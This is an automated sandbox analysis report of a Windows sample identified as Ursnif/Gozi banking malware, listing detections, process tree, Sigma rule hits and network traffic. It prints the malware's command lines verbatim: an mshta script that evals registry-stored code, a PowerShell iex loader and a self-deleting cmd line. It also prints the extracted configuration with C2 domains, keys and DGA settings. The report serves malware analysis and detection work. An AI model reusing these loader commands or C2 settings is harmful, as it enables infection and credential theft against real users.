

Windows Analysis Report anIV2qJeLD.exe

Overview

General Information

Sample Name: anIV2qJeLD.exe
Analysis ID: 527473
MD5: 20c0d2005c6a542fb9c20466775c6142
SHA1: aff311698bd06a0010c9be81dae43d9c37dd847d
SHA256: 4c50ff0945136ff0f79eb75ee7d5c86025282ab519488f692ffc267873160bb6
Tags: exe, Gozi, ISFB

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Found malware configuration
Sigma detected: Powershell run code from registry
Sigma detected: Encoded IEX
Tries to steal Mail credentials (via file / registry access)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

Process Tree

  • System is w10x64
  • anIV2qJeLD.exe (PID: 6968 cmdline: "C:\Users\user\Desktop\anIV2qJeLD.exe" MD5: 20C0D2005C6A542FB9C20466775C6142)
    • control.exe (PID: 4936 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • rundll32.exe (PID: 4972 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 960 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Yy03='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Yy03).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 2088 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4820 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD669.tmp" "c:\Users\user\AppData\Local\Temp\pqwen5zh\CSC508E00641FC7448693989664B7E60.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 2280 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3mkzvx5\i3mkzvx5.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 2368 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF386.tmp" "c:\Users\user\AppData\Local\Temp\i3mkzvx5\CSCB52324015C2F4AC8AC468C73504A2519.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • RuntimeBroker.exe (PID: 3656 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 6752 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\anIV2qJeLD.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 2280 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • RuntimeBroker.exe (PID: 4268 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • RuntimeBroker.exe (PID: 4772 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • RuntimeBroker.exe (PID: 5844 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 6836 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1B15.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 5700 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • RuntimeBroker.exe (PID: 6656 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 5708 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1B15.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 1380 cmdline: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "dm+RfNkITE5FceWriGPYkZaFfoP/k2XQ2jeLd8rNgFw6gJ6fNWsHd0U6akxsQHth/SBWm4/eMI9Y1qgwNJteasgQsUC7Ht20y96mIxH1hvPh9uvLSH5z2CNo+fcP8K+V0yoOOQzDln/qE7mMJHLu+rmogHE7S6lb7FVy/7xxrRe3zMDt5K9bDwOreWw0blGE", "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website", "https://soderunovos.website", "https://qoderunovos.website"], "botnet": "4482", "server": "12", "serpent_key": "10291029JSJUYNHG", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000020.00000000.973836822.000001F4F1140000.00000040.00020000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000014.00000000.824591176.0000000000CA0000.00000040.00020000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000028.00000003.1067142468.00000000036C8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
0000000D.00000003.822024782.00000168B2DDC000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.753488992.00000000047BA000.00000004.00000040.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
(82 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.3.anIV2qJeLD.exe.42994a0.11.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
1.3.anIV2qJeLD.exe.42994a0.11.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
1.3.anIV2qJeLD.exe.47ba4a0.1.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
1.3.anIV2qJeLD.exe.48394a0.3.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
1.3.anIV2qJeLD.exe.47ba4a0.1.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
(2 further entries not shown)

Sigma Overview

System Summary:

Sigma detected: Encoded IEX
Source: Process started; Author: Florian Roth; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Yy03='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Yy03).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 960, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 5180
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Yy03='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Yy03).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 960, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 5180
Sigma detected: Mshta Spawning Windows Shell
Source: Process started; Author: Florian Roth; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Yy03='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Yy03).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 960, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 5180
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5180, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.cmdline, ProcessId: 2088
Sigma detected: Suspicious Rundll32 Activity
Source: Process started; Author: juju4, Jonhnathan Ribeiro, oscd.community; Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 4936, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 4972
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Yy03='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Yy03).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 960, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 5180
Sigma detected: T1086 PowerShell Execution
Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132821702933009973.5180.DefaultAppDomain.powershell

Data Obfuscation:

Sigma detected: Powershell run code from registry
Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Yy03='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Yy03).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 960, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 5180

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000001.00000002.962162001.0000000002030000.00000040.00000001.sdmp; Malware Configuration Extractor: Ursnif {"RSA Public Key": "dm+RfNkITE5FceWriGPYkZaFfoP/k2XQ2jeLd8rNgFw6gJ6fNWsHd0U6akxsQHth/SBWm4/eMI9Y1qgwNJteasgQsUC7Ht20y96mIxH1hvPh9uvLSH5z2CNo+fcP8K+V0yoOOQzDln/qE7mMJHLu+rmogHE7S6lb7FVy/7xxrRe3zMDt5K9bDwOreWw0blGE", "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website", "https://soderunovos.website", "https://qoderunovos.website"], "botnet": "4482", "server": "12", "serpent_key": "10291029JSJUYNHG", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}
Machine Learning detection for sample
Source: anIV2qJeLD.exe; Joe Sandbox ML: detected
Source: 1.2.anIV2qJeLD.exe.2030e50.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 1.3.anIV2qJeLD.exe.3bf0000.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.anIV2qJeLD.exe.400000.0.unpack; Avira: Label: TR/Crypt.XPACK.Gen7

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\anIV2qJeLD.exe; Unpacked PE file: 1.2.anIV2qJeLD.exe.400000.0.unpack
Source: anIV2qJeLD.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\anIV2qJeLD.exe; File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown; HTTPS traffic detected: 98.137.11.163:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 89.44.9.140:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.4:49855 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 212.82.100.140:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: Binary string: 5.pdbw=j source: powershell.exe, 0000000D.00000003.874385564.00000168B230A000.00000004.00000001.sdmp
Source: Binary string: C:\rukemimac\nizejezoyoja-seyikanasocin69\hezosiwem\100\paseve.pdb source: anIV2qJeLD.exe
Source: Binary string: ntdll.pdb source: anIV2qJeLD.exe, 00000001.00000003.821704923.0000000005CC0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.pdbXP source: powershell.exe, 0000000D.00000002.908777927.000001689D0FB000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: anIV2qJeLD.exe, 00000001.00000003.821704923.0000000005CC0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\i3mkzvx5\i3mkzvx5.pdb source: powershell.exe, 0000000D.00000002.908777927.000001689D0FB000.00000004.00000001.sdmp
Source: Binary string: 5.pdb source: powershell.exe, 0000000D.00000003.874385564.00000168B230A000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.pdb source: powershell.exe, 0000000D.00000002.908707605.000001689D0BA000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\i3mkzvx5\i3mkzvx5.pdbXP source: powershell.exe, 0000000D.00000002.908832791.000001689D133000.00000004.00000001.sdmp
Source: Binary string: h.pdb source: powershell.exe, 0000000D.00000003.874385564.00000168B230A000.00000004.00000001.sdmp
Source: Binary string: ]C:\rukemimac\nizejezoyoja-seyikanasocin69\hezosiwem\100\paseve.pdbP+C source: anIV2qJeLD.exe
Source: C:\Users\user\Desktop\anIV2qJeLD.exe; Code function: 1_2_01FDCBE3 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,1_2_01FDCBE3
Source: C:\Users\user\Desktop\anIV2qJeLD.exe; Code function: 1_2_01FDE9AC lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,1_2_01FDE9AC
Source: C:\Users\user\Desktop\anIV2qJeLD.exe; Code function: 1_2_01FE999E lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,1_2_01FE999E
Source: C:\Users\user\Desktop\anIV2qJeLD.exe; Code function: 1_2_01FEA2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,1_2_01FEA2FE
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 40_2_00FEE9AC memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,40_2_00FEE9AC
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 40_2_00FF999E FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,40_2_00FF999E
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 40_2_00FFA2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,40_2_00FFA2FE

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Domain query: lycos.com
Source: C:\Windows\explorer.exe; Domain query: mail.yahoo.com
Source: C:\Windows\explorer.exe; Domain query: login.yahoo.com
Source: C:\Windows\explorer.exe; Domain query: www.lycos.com
Uses nslookup.exe to query domains
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
May check the online IP address of the machine
Source: C:\Windows\System32\nslookup.exe; DNS query: name: myip.opendns.com
Source: C:\Windows\System32\nslookup.exe; DNS query: name: myip.opendns.com
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: Joe Sandbox View; JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
Source: global traffic; HTTP traffic detected: GET /jdraw/nIBVSTLyPt3UY/F_2Fx2Hc/Bze1TT57OG4HBNl2UO4H2_2/F2x5eVeu_2/F0oEIMCthzpdl_2F0/g6yK5x4lAPBL/IfJhlJxCH88/kNEvL4B2xwbPkg/l6LFIMkoo7_2BSx2Zl9QD/sNqAlyxot9VgUnIt/tD2_2FQ67j1kKZ4/4sQxxRyc1y_2Bi_2BR/gsw9z5z81/v3w096aztXCXUnfe5Q/wc2.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: yahoo.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /jdraw/nIBVSTLyPt3UY/F_2Fx2Hc/Bze1TT57OG4HBNl2UO4H2_2/F2x5eVeu_2/F0oEIMCthzpdl_2F0/g6yK5x4lAPBL/IfJhlJxCH88/kNEvL4B2xwbPkg/l6LFIMkoo7_2BSx2Zl9QD/sNqAlyxot9VgUnIt/tD2_2FQ67j1kKZ4/4sQxxRyc1y_2Bi_2BR/gsw9z5z81/v3w096aztXCXUnfe5Q/wc2.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Connection: Keep-Alive | Cache-Control: no-cache | Host: www.yahoo.com | Cookie: B=0m9msshgpqh4o&b=3&s=91
Source: global traffic; HTTP traffic detected: GET /jdraw/izNkSVzKAcmqBRr6xyW/6eSNtrmUMl5kl7H7bHpPPe/XgZq30OCLmJbN/38meyqW9/jS3Kn1JZp4TlGq5YgXpUl9C/Xa1SOjVmRG/sfAXrifyx5RMMj1rG/x2_2B6xVjnCu/FR4yio2EmeZ/DM6_2BUk4qTqT1/rz8mXurCnwQiTqH0u8uPF/_2Bjp7nf0rXmnB1i/Em2dqw_2Bys5D/8.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: soderunovos.website | Connection: Keep-Alive | Cache-Control: no-cache
